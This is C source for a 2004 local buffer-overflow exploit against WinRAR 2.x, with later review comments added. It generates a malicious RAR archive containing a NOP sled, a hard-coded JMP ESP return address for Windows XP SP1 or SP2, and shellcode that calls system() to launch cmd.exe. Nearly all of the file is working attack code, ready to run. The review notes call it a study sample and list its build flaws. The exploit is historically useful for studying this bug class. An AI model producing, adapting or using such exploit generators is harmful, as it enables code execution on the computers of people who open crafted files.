/*
 * WinRar local buffer overflow exploit V1.0
 * Coded By ATmaCA
 * Copyright © 2004 ProGroup Software, Inc.
 * E-Mail:atmaca@prohack.net
 * Web:www.prohack.net
 * Usage:\r\nexploit <Target> <OutputPath>
 * Targets:
 * 1 - WinXP SP1 user32.dll [0x77D718FC]
 * 2 - WinXP SP2 user32.dll [0x77D8AF0A]
 * Example:exploit 1 myrar.rar
 */

/*
 * All WinRar 2.x series are affected
 * 3.x series not affected
 * If you want to test and you do not have WinRar V2.x
 * You can download it from http://atmaca.prorat.net/Src/winrar.zip
 */

/*
 * NOTE(review): 2004 proof-of-concept generator for a historical WinRAR 2.x
 * overflow triggered by a crafted archive. Every address below is hard-coded
 * to one specific Windows XP SP1 or SP2 build, so the output is only a study
 * sample of that bug class; it is not a maintained or portable tool.
 * Build/portability points visible in this file:
 *   - <conio.h> is included but nothing from it is called.
 *   - memcpy() is used, yet <string.h> is never included; only Borland's
 *     <mem.h> declares it here, so other compilers fall back on an implicit
 *     declaration (removed in C99).
 *   - main() is declared void and returns no status (ISO C requires int).
 *   - The target index taken from argv[1] is never range-checked (see main()).
 */

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>   /* no call below uses it; can be dropped */
#ifdef __BORLANDC__
#include <mem.h>     /* Borland's home for memcpy(); elsewhere <string.h> is needed */
#endif

#define NOP 0x90     /* single-byte x86 NOP used as filler */

/*crafted rar header*/
/*
 * Begins with the RAR marker bytes "Rar!\x1A\x07\x00" (0x52 0x61 0x72 0x21 ...),
 * followed by what is presumably a minimal archive/file header — TODO confirm
 * against the RAR 2.x format. The array contains embedded 0x00 bytes, which is
 * why main() emits it byte-wise with sizeof(...)-1 instead of as a C string.
 */
char winrar_header[] =
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00\x00"
"\x00\x00\x00\x00\x4A\x91\x74\x80\x80\x35\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x02\x00\x00\x00\x00\x12";

/*launch a local cmd.exe*/
/*
 * Byte layout matters: bytes 9..12 are the 4-byte immediate of the "mov eax"
 * below, and main() overwrites exactly those four bytes with the per-target
 * sysadrr[] entry before writing. The SP2 value given here is therefore only
 * a placeholder. Note the array is a mutable global that main() patches in
 * place.
 */
char shellcode[]=
"\x68"                  // push "cmd "
"cmd "
"\x8B\xC4"              // mov eax,esp
"\x50"                  // push eax
"\xB8\xc7\x93\xC2\x77"  // mov eax,77C293C7 (address of system() on WinXP SP2 - msvcrt.dll)
"\xFF\xD0"              // call eax
;

/*
 * Return-address table, indexed by targetnum (0 = SP1, 1 = SP2). main() writes
 * the selected entry with fprintf("%s"), which stops at the first 0x00 byte;
 * that only works because neither address here contains a zero byte.
 * There are exactly two entries and main() does not check the index.
 */
char *target[]= //return addr
{
"\xFC\x18\xD7\x77", //User32 jmp esp addr WinXp Sp1
"\x0A\xAF\xD8\x77"  //User32 jmp esp addr WinXp Sp2
};

/*
 * system() address table, same indexing as target[]. Copied into shellcode[]
 * with an explicit 4-byte memcpy(), so embedded zeros would be tolerated here.
 */
char *sysadrr[]=
{
"\x44\x80\xC2\x77", //77C28044 XP Sp1 msvcrt.dll system()
"\xC7\x93\xC2\x77"  //77C293C7 XP Sp2 msvcrt.dll system()
};

/* File-scope only by the author's choice; all three are used solely by main(). */
FILE *di;       /* output archive stream */
int targetnum;  /* 0-based index into target[]/sysadrr[] */
int i;          /* loop counter */

/*
 * Entry point:  exploit <Target> <OutputPath>
 *   argv[1]  1-based target number; converted with atoi() and decremented
 *   argv[2]  path of the .rar file to create (opened with "wb")
 * Output layout, in order: winrar_header, 1051 NOP bytes, the 4-byte target[]
 * entry, 50 NOP bytes, the patched shellcode[], 50 NOP bytes.
 * Returns nothing (void main; see the review note at the top of the file).
 * fputc()/fclose() results are never checked, so a short write to a full disk
 * still prints the success message.
 */
void main(int argc, char *argv[])
{
    if (argc < 3) {
        /* argv[0] is passed but the format has no conversion for it; harmless
         * but flagged by -Wformat-extra-args (same on the Usage line below). */
        printf("\r\nWinRar local buffer overflow exploit V1.0\r\n", argv[0]);
        printf("Coded By ATmaCA\r\n");
        printf("Copyright © 2004 ProGroup Software, Inc.\r\n");
        printf("E-Mail:atmaca@prohack.net\r\n");
        printf("Web:www.prohack.net\r\n\r\n");
        printf("Usage:\r\nexploit <Target> <OutputPath>\r\n\r\n",argv[0]);
        printf("Targets:\n");
        printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n");
        printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n");
        printf("Example:exploit 1 myrar.rar\n");
        return;
    }

    /* No range check: any argv[1] other than "1" or "2" (atoi() also yields 0
     * for non-numeric text, giving -1 here) indexes the two-element
     * target[]/sysadrr[] arrays out of bounds further down. A valid fix is a
     * guard such as: if (targetnum < 0 || targetnum > 1) { usage; return; } */
    targetnum = atoi(argv[1]) - 1;

    if( (di=fopen(argv[2],"wb")) == NULL ) {
        printf("Error opening file!\n");
        return;
    }

    /* sizeof, not strlen: the header holds embedded 0x00 bytes. The -1 drops
     * the string literal's terminating NUL. */
    for(i=0;i<sizeof(winrar_header)-1;i++)
        fputc(winrar_header[i],di);

    /*stuff in a couple of NOPs*/
    /* 1051 is a fixed, target-specific distance; presumably it reaches the
     * saved return address on the affected WinRar 2.x build — nothing in this
     * file derives it. */
    for(i=0;i<1051;i++)
        fputc(NOP,di);

    /* Overwriting the return address (EIP) with the JMP ESP address from
     * user32.dll selected above. Written with "%s", so it depends on the
     * 4-byte value containing no 0x00 (true for both table entries). */
    fprintf(di,"%s",target[targetnum]); //EIP

    for(i=0;i<50;i++) //NOPs
        fputc(NOP,di);

    /* Patch bytes 9..12 of shellcode[] (the "mov eax" immediate) with the
     * per-target system() address; this mutates the global in place. */
    memcpy(shellcode+9,sysadrr[targetnum],4); //system() addr

    /* Shellcode body, now carrying the per-target system() address. */
    for(i=0;i<sizeof(shellcode)-1;i++)
        fputc(shellcode[i],di);

    for(i=0;i<50;i++) //NOPs
        fputc(NOP,di);

    printf("Exploit rar file %s has been generated!\n",argv[2]);
    fclose(di);  /* return value unchecked; a flush failure is silently lost */
}

// milw0rm.com [2004-09-28]